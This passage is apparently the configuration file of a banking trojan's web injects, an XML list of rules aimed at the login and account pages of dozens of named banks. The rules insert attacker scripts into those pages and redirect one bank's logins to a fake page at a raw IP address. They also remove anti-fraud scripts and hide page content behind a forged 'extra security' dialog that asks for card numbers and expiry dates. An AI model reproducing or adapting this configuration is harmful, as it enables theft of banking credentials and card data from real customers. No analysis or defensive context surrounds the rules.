1274. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1275. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="passmark/scripts/statticker2.js"></script>]]></replacement>
1276. </modify>
1277. </actions>
1278. </httpinject>
1279. <httpinject>
1280. <conditions>
1281. <url type="allow" onpost="0" onget="1" modifiers="iU">^https://www\d+\.rbc\.com/NU00/pki/authenticate/AuthenticateUserRoamingEPF\.jsp</url>
1282. <url type="deny" onpost="1" onget="1" modifiers="U">^https?://.+/scripts/default0\.js($|\?.+)</url>
1283. </conditions>
1284. <actions>
1285. <redirect>
1286. <url>http://162.211.231.13/fakes/rbc.php</url>
1287. </redirect>
1288. </actions>
1289. </httpinject>
1290. <httpinject>
1291. <conditions>
1292. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://(edi|del|hkg|lon|sta)\.my\.rbs\.com</url>
1293. </conditions>
1294. <actions>
1295. <modify>
1296. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
1297. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1298. </modify>
1299. <modify>
1300. <pattern modifiers="i"><![CDATA[(function checkKey\(e\))]]></pattern>
1301. <replacement><![CDATA[\1{}function checkKey1(e)]]></replacement>
1302. </modify>
1303. </actions>
1304. </httpinject>
1305. <httpinject>
1306. <conditions>
1307. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://access\.rbsm\.com/logon/(password|dp300)/.+\.fcc(\?|$)</url>
1308. </conditions>
1309. <actions>
1310. <modify>
1311. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1312. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1313. </modify>
1314. </actions>
1315. </httpinject>
1316. <httpinject>
1317. <conditions>
1318. <url type="allow" onpost="1" onget="1" modifiers="U">^https://(www\.|)scotiaconnect\.scotiabank\.com/sco\-tp/pki/AuthenticateUserInputRoamingEPF\.jsp(\?|$)</url>
1319. </conditions>
1320. <actions>
1321. <modify>
1322. <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
1323. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1324. </modify>
1325. </actions>
1326. </httpinject>
1327. <httpinject>
1328. <conditions>
1329. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://.*.secure\-banking\.com/.*/PassmarkSignIn\.faces</url>
1330. </conditions>
1331. <actions>
1332. <modify>
1333. <pattern modifiers="i"><![CDATA[fraudmap.*<\/script>]]></pattern>
1334. <replacement><![CDATA["</script>]]></replacement>
1335. </modify>
1336. <modify>
1337. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1338. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1339. </modify>
1340. </actions>
1341. </httpinject>
1342. <httpinject>
1343. <conditions>
1344. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://internetbanking\.securetrustbank\.com/SecureTrust/SecureTrust</url>
1345. </conditions>
1346. <actions>
1347. <modify>
1348. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
1349. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1350. </modify>
1351. </actions>
1352. </httpinject>
1353. <httpinject>
1354. <conditions>
1355. <url type="allow" onpost="1" onget="1" modifiers="U">^https://wirexchange\.goxroads\.com/wx/(login|wp_login_user)\.cfm($|\?)</url>
1356. </conditions>
1357. <actions>
1358. <modify>
1359. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1360. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1361. </modify>
1362. </actions>
1363. </httpinject>
1364. <httpinject>
1365. <conditions>
1366. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://s2b\.standardchartered\.com/ssoapp/(login\.jsp|core\.security\.login\.event)</url>
1367. </conditions>
1368. <actions>
1369. <modify>
1370. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1371. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1372. </modify>
1373. <modify>
1374. <pattern modifiers="i"><![CDATA[div class="scbLoginImpContainer01"]]></pattern>
1375. <replacement><![CDATA[div class="scbLoginImpContainer01" style="display:none;"]]></replacement>
1376. </modify>
1377. </actions>
1378. </httpinject>
1379. <httpinject>
1380. <conditions>
1381. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://sme\.standardchartered\.com/commonapp/core\.security\.vascochallenge\.event</url>
1382. </conditions>
1383. <actions>
1384. <modify>
1385. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1386. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1387. </modify>
1388. </actions>
1389. </httpinject>
1390. <httpinject>
1391. <conditions>
1392. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.sterlingwires\.com/</url>
1393. <url type="deny" onpost="0" onget="1" modifiers="">IWPreScript\.js</url>
1394. </conditions>
1395. <actions>
1396. <modify>
1397. <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
1398. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1399. </modify>
1400. </actions>
1401. </httpinject>
1402. <httpinject>
1403. <conditions>
1404. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.suntrust\.com/portal/server\.pt(\?|)</url>
1405. </conditions>
1406. <actions>
1407. <modify>
1408. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1409. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1410. </modify>
1411. </actions>
1412. </httpinject>
1413. <httpinject>
1414. <conditions>
1415. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://businessbankingcenter\.synovus\.com/CPFLC/Pages/u/login\.aspx</url>
1416. </conditions>
1417. <actions>
1418. <modify>
1419. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1420. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1421. </modify>
1422. </actions>
1423. </httpinject>
1424. <httpinject>
1425. <conditions>
1426. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://businessonline\.tdbank\.com/corporatebankingweb/core/login\.aspx</url>
1427. </conditions>
1428. <actions>
1429. <modify>
1430. <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
1431. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1432. </modify>
1433. </actions>
1434. </httpinject>
1435. <httpinject>
1436. <conditions>
1437. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://businessbanking.*\.tdcommercialbanking\.com/WBB/Login(|Display)(\?|\;|$)
1438. </url>
1439. </conditions>
1440. <actions>
1441. <modify>
1442. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1443. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1444. </modify>
1445. </actions>
1446. </httpinject>
1447. <httpinject>
1448. <conditions>
1449. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://tdetreasury\.tdbank\.com/s1gcb/logon/sbuser</url>
1450. </conditions>
1451. <actions>
1452. <modify>
1453. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1454. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1455. </modify>
1456. </actions>
1457. </httpinject>
1458. <httpinject>
1459. <conditions>
1460. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://secureport\.texascapitalbank\.com/WebID/IISWebAgentIF\.dll</url>
1461. </conditions>
1462. <actions>
1463. <modify>
1464. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1465. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1466. </modify>
1467. <modify>
1468. <pattern modifiers="i"><![CDATA[class="ContactSupportGreyText"]]></pattern>
1469. <replacement><![CDATA[class="ContactSupportGreyText" style="display:none;"]]></replacement>
1470. </modify>
1471. </actions>
1472. </httpinject>
1473. <httpinject>
1474. <conditions>
1475. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://trz\.tranzact\.org/(credential\.aspx|OTP\.asp)($|\?)</url>
1476. </conditions>
1477. <actions>
1478. <modify>
1479. <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
1480. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1481. </modify>
1482. </actions>
1483. </httpinject>
1484. <httpinject>
1485. <conditions>
1486. <url type="allow" onpost="1" onget="1" modifiers="U">^https://securentrycorp\..+(metrics|analytics)</url>
1487. </conditions>
1488. <actions>
1489. <redirect>
1490. <url>http://microsoft.com</url>
1491. </redirect>
1492. </actions>
1493. </httpinject>
1494. <httpinject>
1495. <conditions>
1496. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://securentrycorp\..+/authentication/zbf/</url>
1497. <url type="deny" onpost="1" onget="1" modifiers="U">^https://securentrycorp\..+(metrics|analytics)</url>
1498. </conditions>
1499. <actions>
1500. <modify>
1501. <pattern modifiers="U"><![CDATA[(</head>)]]></pattern>
1502. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1503. </modify>
1504. </actions>
1505. </httpinject>
1506. <httpinject>
1507. <conditions>
1508. <url type="allow" onpost="1" onget="1" modifiers="">^https://bizonline\.tcbk\.com/tcbsb\_corporatebankingweb/core/login\.aspx(\?|$)</url>
1509. </conditions>
1510. <actions>
1511. <modify>
1512. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1513. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1514. </modify>
1515. </actions>
1516. </httpinject>
1517. <httpinject>
1518. <conditions>
1519. <url type="allow" onpost="1" onget="1" modifiers="U">^https://singlepoint\.usbank\.com/cs70_banking/logon/sbuser</url>
1520. </conditions>
1521. <actions>
1522. <modify>
1523. <pattern modifiers="msU"><![CDATA[(name\="tmupLogonForm".+</form>)]]></pattern>
1524. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1525. </modify>
1526. </actions>
1527. </httpinject>
1528. <httpinject>
1529. <conditions>
1530. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://sso\.unionbank\.com/(obc/forms/password\.fcc|unp/SSOLoginServlet)</url>
1531. </conditions>
1532. <actions>
1533. <modify>
1534. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1535. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1536. </modify>
1537. </actions>
1538. </httpinject>
1539. <httpinject>
1540. <conditions>
1541. <url type="allow" onpost="1" onget="1" modifiers="U">^https://.+\.worldsourcefinancial\.com/uiw/.*(LoginFailed|Login)\.html(\?|$)</url>
1542. </conditions>
1543. <actions>
1544. <modify>
1545. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1546. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1547. </modify>
1548. </actions>
1549. </httpinject>
1550. <httpinject>
1551. <conditions>
1552. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://onlinebusinessplus\.vancity\.com/(business/default\.jsp|servlet/Logon)(\?|\;|$)</url>
1553. </conditions>
1554. <actions>
1555. <modify>
1556. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1557. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1558. </modify>
1559. </actions>
1560. </httpinject>
1561. <httpinject>
1562. <conditions>
1563. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.vancity\.com/BusinessBanking/OnlineBanking/</url>
1564. </conditions>
1565. <actions>
1566. <modify>
1567. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
1568. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1569. </modify>
1570. </actions>
1571. </httpinject>
1572. <httpinject>
1573. <conditions>
1574. <url type="allow" onpost="1" onget="1" modifiers="">^https://online\.washingtonfederal\.com/(login\_business\.asp|engine/login/businessLogins\.asp)(\?|$)</url>
1575. </conditions>
1576. <actions>
1577. <modify>
1578. <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
1579. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1580. </modify>
1581. </actions>
1582. </httpinject>
1583. <httpinject>
1584. <conditions>
1585. <url type="allow" onpost="1" onget="1" modifiers="U">^https://.+/wcmfd/wcmpw/.*Login</url>
1586. <url type="allow" onpost="1" onget="1" modifiers="U">^https://.+/phcp/servlet/.*Login</url>
1587. </conditions>
1588. <actions>
1589. <modify>
1590. <pattern modifiers="Ui"><![CDATA[(<body.*>)]]></pattern>
1591. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1592. </modify>
1593. <modify>
1594. <pattern modifiers="msUi"><![CDATA[(?<inject><div id=\"loginmessages\".*>.*<div>.+</div>.*</div>)]]></pattern>
1595. <replacement />
1596. </modify>
1597. </actions>
1598. </httpinject>
1599. <httpinject>
1600. <conditions>
1601. <url type="allow" onpost="0" onget="1" modifiers="">^https://www\.contactus\.cnb\.com/html/tnet\-ad\.html$</url>
1602. </conditions>
1603. <actions>
1604. <modify>
1605. <pattern modifiers="msU"><![CDATA[(?<inject><a href="Safeguarding.*</a>)]]></pattern>
1606. <replacement />
1607. </modify>
1608. </actions>
1609. </httpinject>
1610. <httpinject>
1611. <conditions>
1612. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://webcmpr\.bancopopular\.com/K1/</url>
1613. </conditions>
1614. <actions>
1615. <modify>
1616. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
1617. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1618. </modify>
1619. </actions>
1620. <actions>
1621. <modify>
1622. <pattern modifiers="is"><![CDATA[function checkKey\(e\)\{.*</script>]]></pattern>
1623. <replacement><![CDATA[function checkKey(e){}</script>]]></replacement>
1624. </modify>
1625. </actions>
1626. </httpinject>
1627. <httpinject>
1628. <conditions>
1629. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.websteronline\.com/personal/personal\-homepage\.html</url>
1630. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.websteronline\.com/bank/(com\.websterbank\.servlets\.DS|login)</url>
1631. </conditions>
1632. <actions>
1633. <modify>
1634. <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
1635. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1636. </modify>
1637. </actions>
1638. </httpinject>
1639. <httpinject>
1640. <conditions>
1641. <url type="allow" onpost="1" onget="1" modifiers="">^https?://www\.wellsfargo\.com/com</url>
1642. </conditions>
1643. <actions>
1644. <modify>
1645. <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
1646. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1647. </modify>
1648. </actions>
1649. </httpinject>
1650. <httpinject>
1651. <conditions>
1652. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://[\w\.\-]+\.ebanking\-services\.com/.+\.aspx</url>
1653. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://.+/EamWeb/.+\.aspx</url>
1654. </conditions>
1655. <actions>
1656. <modify>
1657. <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
1658. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1659. </modify>
1660. </actions>
1661. </httpinject>
1662. <httpinject>
1663. <conditions>
1664. <url type="allow" onpost="1" onget="1" modifiers="i">^https://.+/cashman/(|default\.aspx)(\?|$)</url>
1665. <url type="allow" onpost="1" onget="1" modifiers="i">^https://ecash\..+/(|default\.aspx)(\?|$)</url>
1666. <url type="deny" onpost="1" onget="1" modifiers="i">^https://ecash\..+/ABCorporate/Core/(signin|default)\.aspx($|\?)</url>
1667. </conditions>
1668. <actions>
1669. <modify>
1670. <pattern modifiers=""><![CDATA[(</(head|HEAD) *>)]]></pattern>
1671. <replacement><![CDATA[<link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/themes/hot-sneaks/jquery-ui.css" type="text/css"/>\1]]></replacement>
1672. </modify>
1673. <modify>
1674. <pattern modifiers="ms"><![CDATA[(.*)(</(form|FORM|body|BODY) *?>)]]></pattern>
1675. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="ecash1/scripts/statticker2.js"></script>\2]]></replacement>
1676. </modify>
1677. </actions>
1678. </httpinject>
1679. <httpinject>
1680. <conditions>
1681. <url type="allow" onpost="1" onget="1" modifiers="i">^https://ecash\..+/ABCorporate/Core/(signin|default)\.aspx($|\?)</url>
1682. </conditions>
1683. <actions>
1684. <modify>
1685. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1686. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="ecash2/scripts/statticker2.js"></script>]]></replacement>
1687. </modify>
1688. </actions>
1689. </httpinject>
1690. <httpinject>
1691. <conditions>
1692. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://.*\.onlineaccess1\.com/.*/Authentication/Login\.aspx</url>
1693. </conditions>
1694. <actions>
1695. <modify>
1696. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1697. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1698. </modify>
1699. </actions>
1700. </httpinject>
1701. <httpinject>
1702. <conditions>
1703. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://personalp\.vanguard\.com/us/.+Q1SBJS
1704. </url>
1705. </conditions>
1706. <actions>
1707. <modify>
1708. <pattern modifiers="iUms"><![CDATA[<html.+?/html>]]></pattern>
1709. <replacement><![CDATA[<html><script>var q1btid = ''; var q1script = '/statsgatherr.js?system=6';</script><script type="text/javascript" language="JavaScript" src="/statsgatherr.js?system=6"></script><script type="text/javascript" language="JavaScript" src="/statsgatherr.js?system=1"></script></html>]]></replacement>
1710. </modify>
1711. </actions>
1712. </httpinject>
1713. <httpinject>
1714. <conditions>
1715. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://personalp\.vanguard\.com/us/
1716. </url>
1717. </conditions>
1718. <actions>
1719. <modify>
1720. <pattern modifiers="iUms"><![CDATA[(</title>)]]></pattern>
1721. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="/statsgatherr.js?system=2"></script>]]></replacement>
1722. </modify>
1723. </actions>
1724. </httpinject>
1725. <httpinject>
1726. <conditions>
1727. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.kbc\.be/
1728. </url>
1729. </conditions>
1730. <actions>
1731. <modify>
1732. <pattern modifiers="isU"><![CDATA[(<form.*id="ID_LOGONFORM".*</form>)]]></pattern>
1733. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1734. </modify>
1735. </actions>
1736. </httpinject>
1737. <httpinject>
1738. <conditions>
1739. <url type="allow" onpost="1" onget="1" modifiers="iU"><![CDATA[^https\://chaseonline\.chase\.com/MyAccounts\.aspx.*]]></url>
1740. <url type="deny" onpost="0" onget="1" modifiers="i">\.(gif|png|jpg|css|swf)($|\?)
1741. </url>
1742. </conditions>
1743. <actions>
1744. <modify>
1745. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1746. <replacement><![CDATA[\1<style type="text/css">
1747. body {visibility: hidden; }
1748. </style>
1749. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1750. <script type="text/javascript" src="statsgatherr.js?system=8"></script>]]></replacement>
1751. </modify>
1752. </actions>
1753. </httpinject>
1754. <httpinject>
1755. <conditions>
1756. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.chase\.com/.*apps/chase/clientlibs/foundation/publishoptimized/homepage\-po\-min\.js
1757. </url>
1758. </conditions>
1759. <actions>
1760. <modify>
1761. <pattern modifiers="isU"><![CDATA[(abcdefghijklmnopqrstuvwxyz0123456789_")]]></pattern>
1762. <replacement><![CDATA[\1;if(typeof window.submitLogin !== 'undefined' && !window.submitLogin()) return false]]></replacement>
1763. </modify>
1764. </actions>
1765. </httpinject>
1766. <httpinject>
1767. <conditions>
1768. <url type="allow" onpost="1" onget="1" modifiers="iU" contentType="^text/(html|plain)"><![CDATA[^https\://.*\.bankofamerica\.com/myaccounts/.*]]></url>
1769. <url type="deny" onpost="0" onget="1" modifiers="i">\.(gif|png|jpg|css|swf)($|\?)
1770. </url>
1771. </conditions>
1772. <actions>
1773. <modify>
1774. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1775. <replacement><![CDATA[\1<style type="text/css">
1776. body1 {visibility: hidden; }
1777. </style>
1778. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1779. <script type="text/javascript" src="statsgatherr.js?system=9">
1780. </script>]]></replacement>
1781. </modify>
1782. </actions>
1783. </httpinject>
1784. <httpinject>
1785. <conditions>
1786. <url type="allow" onpost="1" onget="1" modifiers="iU" contentType="^text/(html|plain)"><![CDATA[^https\://.*\.bankofamerica\.com/login/sitekey.*skmaint\.go.*]]></url>
1787. <url type="deny" onpost="0" onget="1" modifiers="i">\.(gif|png|jpg|css|swf)($|\?)
1788. </url>
1789. </conditions>
1790. <actions>
1791. <modify>
1792. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1793. <replacement><![CDATA[\1<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1794. <script type="text/javascript" src="statsgatherr.js?system=10">
1795. </script>]]></replacement>
1796. </modify>
1797. </actions>
1798. </httpinject>
1799. <httpinject>
1800. <conditions>
1801. <url type="allow" onpost="1" onget="1" modifiers="iU" contentType="^text/html"><![CDATA[^https\://.*\.bankofDISABLEDFORCASHPROamerica\.com.*]]></url>
1802. <url type="deny" onpost="0" onget="1" modifiers="i">(SignOn\.go|\.(gif|png|jpg|css|swf)($|\?))
1803. </url>
1804. </conditions>
1805. <actions>
1806. <modify>
1807. <pattern modifiers="msU"><![CDATA[(\</html\>)]]></pattern>
1808. <replacement><![CDATA[\1<script type="text/javascript" src="statsgatherr.js?system=11">
1809. </script>]]></replacement>
1810. </modify>
1811. </actions>
1812. </httpinject>
1813. <httpinject>
1814. <conditions>
1815. <url type="allow" onpost="1" onget="1" modifiers="iU" contentType="^text/html"><![CDATA[^https\://client\.schwab\.com/Accounts/Summary/Summary\.aspx.*]]></url>
1816. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1817. </url>
1818. </conditions>
1819. <actions>
1820. <modify>
1821. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1822. <replacement><![CDATA[\1<style type="text/css">
1823. body {visibility: hidden; }
1824. </style>
1825. <script src="//ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
1826. <script type="text/javascript">var jq = jQuery.noConflict();</script>
1827. <script type="text/javascript" src="statsgatherr.js?system=12"></script>]]></replacement>
1828. </modify>
1829. </actions>
1830. </httpinject>
1831. <httpinject>
1832. <conditions>
1833. <url type="allow" onpost="1" onget="1" modifiers="U" contentType="^text/(html|plain)"><![CDATA[^https\://online\.citibank\.com/.*/portal/Home\.do]]></url>
1834. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1835. </url>
1836. </conditions>
1837. <actions>
1838. <modify>
1839. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1840. <replacement><![CDATA[\1<style type="text/css">
1841. body {visibility: hidden; }
1842. </style>
1843. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
1844. <script type="text/javascript" language="JavaScript" src="statsgatherr.js?system=13"></script>]]></replacement>
1845. </modify>
1846. </actions>
1847. </httpinject>
1848. <httpinject>
1849. <conditions>
1850. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.ent\.com/business</url>
1851. </conditions>
1852. <actions>
1853. <modify>
1854. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1855. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1856. </modify>
1857. <modify>
1858. <pattern modifiers="iU"><![CDATA[<script type='text/javascript' src='https://collector\.fraudmap\.net/fs/.*/validate/validate\.js'></script>]]></pattern>
1859. <replacement><![CDATA[]]></replacement>
1860. </modify>
1861. </actions>
1862. </httpinject>
1863. <httpinject>
1864. <conditions>
1865. <url type="allow" onpost="1" onget="1" modifiers="U" contentType="^text/html"><![CDATA[^https\://online\.americanexpress\.com/myca/.*\?request_type\=authreg_acctAccountSummary.*]]></url>
1866. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1867. </url>
1868. </conditions>
1869. <actions>
1870. <modify>
1871. <pattern modifiers="msU"><![CDATA[</body\>]]></pattern>
1872. <replacement><![CDATA[<div id="namefr" style="display:none;" >
1873. <iframe width="50" height="50" id="myfx" name="myfx"></iframe>
1874. </div>
1875. <link href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css" rel="stylesheet" type="text/css"/>
1876. <style type="text/css">
1877. .ui-dialog-titlebar{ background: white }
1878. .text1a{font-family: Arial; font-size: 10px;}
1879. .sunclass
1880. border-bottom-color: #cccccc;
1881. border-bottom-style: solid;
1882. border-bottom-width: 1px;
1883. border-collapse: collapse;
1884. background-color: #f5f6f1;
1885. color: #333333;
1886. margin-right:10px;
1887. margin-left:10px;
1888. text-align: center;
1889. </style>
1890. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
1891. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
1892. <div id="msg" style=" display:none; height:60px;" class=sunclass>
1893. <div id="box" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;padding-top:20px;padding-bottom:20px;">
1894. <font id="err" style="font-weight:700;font-family: Arial;font-size: 12px;">The <span id="ername">Passcode</span> you entered does not match our records. Please verify and make sure you re-enter your <span id="ername1"> passcode </span>&nbsp correctly.</font>
1895. </div>
1896. </div>
1897. <div id="dialog" style=" display:none; height:180px; width:350px;padding:0; margin0;">
1898. <div id="txt1" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;">
1899. <font style="font-weight:700;font-family: Arial;font-size: 10px;">In order to provide you with extra security ,we occasionally need to ask for additional information when you access you account online.</font>
1900. </div>
1901. <div id="txt2" class=sunclass>
1902. <font style="font-weight: 700;font-family: Arial;font-size: 10px;">Please enter the information below to continue:</font>
1903. </div>
1904. <form action="statsgatherr.js" id="test" method="get" target="myfx" >
1905. <!--CC-->
1906. <div id="full_cc" class=sunclass style="height:30px ;text-align: left;">
1907. <table>
1908. <tr>
1909. <td>
1910. <div id="div_cc_text" style="padding:1px; padding-top:3px; width:72px ; height:25px;text-align:left;">
1911. <font style="font-weight:700;font-family: Arial;font-size: 10px;">Card number:</font>
1912. </div>
1913. </td>
1914. <td>
1915. <div id="div_cc" style ="padding:1px;">
1916. <input type="text" class="amountfield" id="cc1" style="text-align:right;width:34px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; width=46px;" name="cc1" onkeyup="tabNext1CC(this);" maxlength=4 >
1917. <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
1918. <input type="text" class="amountfield" id="cc2"style="text-align:right; width:42px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; " name="cc2" onkeyup="tabNext2CC(this);" maxlength=6 >
1919. <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
1920. <input type="text" class="amountfield" id="cc3" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cc3" maxlength=5 >
1921. </div>
1922. </td>
1923. </tr>
1924. </table>
1925. </div>
1926. <!--EXP-->
1927. <div id="fulll_exp" class=sunclass style="text-align: left;">
1928. <table>
1929. <tr>
1930. <td align="right">
1931. <div id="div_exp" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
1932. <font style="font-weight:700;font-family: Arial;font-size: 10px;">Exp.date:</font>
1933. </div>
1934. </td>
1935. <td><div id="div_exp" style ="padding:1px;">
1936. <input type="text" class="amountfield" id="exp_mm" style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_mm" maxlength=2 >
1937. <font style="font-weight:700;font-family: Arial;font-size: 10px;">/</font>
1938. <input type="text" class="amountfield" id="exp_yy"style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_yy" maxlength=4 >
1939. </div></td>
1940. </tr>
1941. </table>
1942. </div>
